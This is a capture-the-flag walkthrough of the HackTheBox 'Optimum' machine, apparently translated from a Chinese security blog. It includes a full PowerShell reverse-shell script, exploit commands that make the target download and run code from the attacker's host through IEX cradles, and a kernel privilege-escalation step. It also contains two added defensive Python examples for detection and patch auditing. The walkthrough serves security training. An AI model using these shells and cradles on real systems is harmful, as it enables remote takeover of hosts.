Target information
Target URL:
https://app.hackthebox.com/machines/Optimum
Platform: HackTheBox.com
Machine name: Optimum
Difficulty: Easy
Hints:
None
Objective: user.txt and root.txt
Lab environment
Attacker: Kali 10.10.16.3
Target: 10.10.10.8
Information gathering
Port scan
Scan the target for open service ports
sudo masscan -p1-65535 -e tun0 10.10.10.8
sudo nmap -sC -sV -p 80 10.10.10.8 -oN nmap.log
The scan shows only port 80 open, served by HttpFileServer httpd 2.3.
Web penetration
Visit port 80
At the bottom left of the page the program version HttpFileServer 2.3 is shown, matching the nmap result; check whether known vulnerabilities exist for this version.
An RCE (remote code/command execution) vulnerability is found.
The exploit code is simple; copy it, save it to a .py file and verify the exp.
vim HttpFileServer-2.3-exp.py
Reverse shell script rev.ps1 (I forget where this script was downloaded from, so here is the code directly. Note: change the last line to your own IP and port)
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.
The script is derived from Powerfun written by Ben Turner & Dave Hardy
.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.
.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 80
Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(
        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind
    )

    try
    {
        #Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }

        #Bind to the provided port if Bind switch is used.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()
            $client = $listener.AcceptTcpClient()
        }

        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}

        #Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)

        #Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)

        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                #Execute the command on the target.
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target."
                Write-Error $_
            }
            $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x

            #Return the results
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 4444
On the attacker machine, start an HTTP server in the directory containing the reverse shell script
py3 -m http.server
Listen on port 4444 on the attacker machine
nc -lnvp 4444
Run the exp so that the target downloads rev.ps1 from the attacker machine and loads it
py3 HttpFileServer-2.3-exp.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/rev.ps1')"
The reverse shell comes back; now look for sensitive information
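The detection side of this step, added here as an example that is not part of the original writeup: the exploit makes the HFS service process spawn PowerShell with an in-memory download cradle, and both the parent/child pair and the command line are visible in process-creation telemetry. The records below are constructed Sysmon-style fields; the hfs.exe install path and the benign events are assumed.

```python
import re

# Constructed process-creation records shaped like Sysmon Event ID 1 fields;
# sample data, not telemetry from the target.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\HFS\hfs.exe",
     "Image": r"C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://10.10.16.3:8000/rev.ps1')"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ParentImage": r"C:\Program Files\HFS\hfs.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# Both parts of a download cradle must be present: an evaluator and a fetch.
CRADLE_PATTERNS = [
    re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I),
]


def classify(event):
    """Return the names of the rules the event matches (empty list = benign)."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    hits = []
    # Rule 1: a file server process has no business spawning a shell.
    if parent == "hfs.exe" and image in {"powershell.exe", "cmd.exe"}:
        hits.append("hfs_spawned_shell")
    # Rule 2: in-memory download cradle (IEX plus a WebClient fetch).
    if all(p.search(cmd) for p in CRADLE_PATTERNS):
        hits.append("powershell_download_cradle")
    # Rule 3: SysNative only exists for 32-bit processes escaping WoW64
    # redirection to reach 64-bit PowerShell, as the exploit command does.
    if "\\sysnative\\" in event["Image"].lower():
        hits.append("sysnative_powershell_launch")
    return hits


def scan(events):
    """Return (index, matched rules) for every event that triggers a rule."""
    alerts = []
    for i, e in enumerate(events):
        hits = classify(e)
        if hits:
            alerts.append((i, hits))
    return alerts
```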
ls
type user.txt.txt
The flag is on the current user's desktop; continue collecting sensitive information
systeminfo
The target has 31 patches installed; compare them on an online site
https://i.hacking8.com/tiquan
The results are shown at the bottom of the page
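The comparison above is done by pasting systeminfo output into a third-party site. The same check can be done offline, which keeps host details off someone else's server; the parser below is an added example, not the author's tooling or the site's logic. The systeminfo excerpt is constructed, and the advisory-to-KB mapping is a placeholder to be filled from the vendor's guidance for the host's OS build.

```python
import re

# Constructed excerpt of `systeminfo` output; the KB numbers are sample values,
# not the target's real hotfix list.
SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft Windows Server 2012 R2 Standard
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3000850
Network Card(s):           1 NIC(s) Installed.
"""

# Hypothetical mapping of advisory -> KB IDs that close it. KB0000000 is a
# placeholder; look up the real KB for the host's build and substitute it.
REQUIRED_KBS = {
    "CVE-2016-7255 (placeholder KB)": {"KB0000000"},
}


def parse_hotfixes(text):
    """Return (declared count, set of KB ids) from the Hotfix(s) section."""
    m = re.search(r"Hotfix\(s\):\s+(\d+) Hotfix\(s\) Installed\.", text)
    declared = int(m.group(1)) if m else 0
    kbs = set()
    in_section = False
    for line in text.splitlines():
        if line.startswith("Hotfix(s):"):
            in_section = True
            continue
        if in_section:
            km = re.match(r"\s+\[\d+\]:\s*(KB\d+)", line)
            if not km:
                break  # first non-indexed line ends the hotfix list
            kbs.add(km.group(1))
    return declared, kbs


def audit(text, required=REQUIRED_KBS):
    """Flag advisories for which none of the closing KBs is installed."""
    declared, installed = parse_hotfixes(text)
    missing = {adv: kbs - installed
               for adv, kbs in required.items() if not kbs & installed}
    return {"declared": declared, "parsed": len(installed),
            "consistent": declared == len(installed), "missing": missing}
```

A mismatch between the declared count and the parsed entries usually means the output was truncated or copied incompletely, so check that before trusting the missing list.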
Verify this exp
https://github.com/Ascotbe/Kernelhub/blob/master/CVE-2016-7255/CVE-2016-7255.ps1
IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/CVE-2016-7255.ps1')
Check the privileges after running it
whoami
Privilege escalation succeeded; find the flag
cd c:\users\administrator\desktop
type root.txt
root.txt obtained; game over
Originally published on the WeChat official account (伏波路上学安全): Penetration testing practice No.124 HTB: Optimum (OSCP Prep)